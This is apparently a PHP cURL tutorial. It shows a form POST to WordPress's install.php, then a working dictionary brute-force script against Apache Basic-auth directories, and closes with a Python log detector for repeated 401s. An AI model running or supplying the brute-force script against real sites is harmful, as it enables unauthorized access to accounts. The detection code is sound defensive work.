libcurl is a free and easy-to-use client-side URL transfer library, supporting FTP, FTPS, HTTP, HTTPS, SCP, SFTP, TFTP, TELNET, DICT, LDAP, LDAPS and FILE. libcurl supports SSL certificates, HTTP POST, HTTP PUT, FTP uploading, HTTP form based upload, proxies, cookies, user+password authentication (Basic, Digest, NTLM, Negotiate, Kerberos4), file transfer resume, HTTP proxy tunneling and more!
PHP supports libcurl, a library created by Daniel Stenberg, that allows you to connect to and communicate with many different types of servers using many different types of protocols.
How do you submit a form POST using cURL?
Submitting a form POST using cURL is pretty simple.
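// $wp_admin_email, $wp_title and $cookie (path of the cookie jar file) must be set before this runs
$url = 'http://mydomain.com/';
// URL-encode the variable values so characters such as & or = cannot break the form body
$postdata = "Submit=Install%20WordPress&admin_email=" . urlencode($wp_admin_email) . "&blog_public=1&weblog_title=" . urlencode($wp_title);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url . "wp-admin/install.php?step=2");
// Verify the server certificate (the libcurl default); this applies once $url uses https
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, TRUE);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6");
curl_setopt($ch, CURLOPT_TIMEOUT, 60);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); // Return the response instead of printing it
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookie); // Save received cookies to this file
curl_setopt($ch, CURLOPT_REFERER, $url . "wp-admin/install.php");
curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
curl_setopt($ch, CURLOPT_POST, 1);
$result = curl_exec($ch); // Response body, or FALSE on failure
curl_close($ch);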
I created this sample code to send a POST to WordPress's install.php without opening that page manually. This means I can send a form POST from outside of the target domain and display the result from my executed code.
What other things can cURL do?
cURL Brute Force Script
The following cURL script can be used to brute force Apache .htaccess authentication:
$url = "http://www.example.com/admin/"; // Set the URL to be bruteforced
$ref = "http://www.example.com/index.php"; // Set the referrer to spoof
$denied = "Forbidden"; // Set the "Denied" output
$wordlist = "/var/www/wordlist.txt"; // Set the wordlist location
set_time_limit( 0 ); // Set script execution limit. 0 = no limit
$ch = curl_init( ); // Initialise cURL
curl_setopt( $ch, CURLOPT_URL, $url ); // Set URL as $url
curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 ); // Set RETURNTRANSFER to TRUE
curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 ); // Set FOLLOWLOCATION to TRUE
foreach( file( $wordlist, FILE_IGNORE_NEW_LINES ) as $password ) // Start the loop for dictionary attack (newlines stripped)
{
    $force = "http://admin:{$password}@www.example.com/admin/"; // Set the URL to attack
    curl_setopt( $ch, CURLOPT_URL, $force ); // Load the URL to attack with cURL
    $check = curl_exec( $ch ); // Fetch the response to check
    if( stripos( $check, $denied ) === false ) // Check that $denied is not in the page (eregi() was removed in PHP 7)
    {
        die( "Success! The password is: {$password}" ); // $denied was not found, success
    }
}
curl_close( $ch ); // Close the cURL process
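Seen from the server side, each rejected guess from a loop like the one above appears in the Apache access log as a 401 response carrying the attempted user name. The following Python sketch is an added example, not code from the original post: it flags a client and user with repeated 401s inside a short window and records whether a later request succeeded. The log format (Apache common/combined), the threshold of 5 failures in 60 seconds and the sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache common/combined log prefix: host ident user [time] "request" status ...
LINE = re.compile(r'^(\S+) \S+ (\S+) \[([^\]]+)\] "[^"]*" (\d{3}) ')

def detect_basic_auth_guessing(lines, threshold=5, window=timedelta(seconds=60)):
    """Return (ip, user, failures, succeeded) for clients with repeated 401s.

    failures is the largest number of 401s seen inside one window; succeeded
    is True when the same client/user later got a 2xx/3xx response, which
    means one of the guesses may have worked and the account needs review.
    """
    recent = defaultdict(deque)   # (ip, user) -> timestamps of recent 401s
    alerts = {}                   # (ip, user) -> [failures, succeeded]
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue              # skip lines that are not in the expected format
        ip, user, ts, status = m.groups()
        when = datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z")
        key = (ip, user)
        if status == "401":
            q = recent[key]
            q.append(when)
            while when - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold:
                prev = alerts.get(key, [0, False])
                alerts[key] = [max(len(q), prev[0]), prev[1]]
        elif status[0] in "23" and key in alerts:
            alerts[key][1] = True
    return [(ip, user, n, ok) for (ip, user), (n, ok) in alerts.items()]

# Constructed sample: six failed attempts in six seconds followed by a success,
# then an ordinary user who mistypes a password once.
SAMPLE = [f'203.0.113.7 - admin [10/Oct/2023:13:55:{s:02d} +0000] "GET /admin/ HTTP/1.1" 401 381'
          for s in range(1, 7)]
SAMPLE += [
    '203.0.113.7 - admin [10/Oct/2023:13:55:07 +0000] "GET /admin/ HTTP/1.1" 200 5120',
    '198.51.100.4 - alice [10/Oct/2023:13:56:00 +0000] "GET /admin/ HTTP/1.1" 401 381',
    '198.51.100.4 - alice [10/Oct/2023:13:56:05 +0000] "GET /admin/ HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for alert in detect_basic_auth_guessing(SAMPLE):
        print(alert)
```

An alert with succeeded set to True is the case to act on first: rotate that password and review what the session accessed.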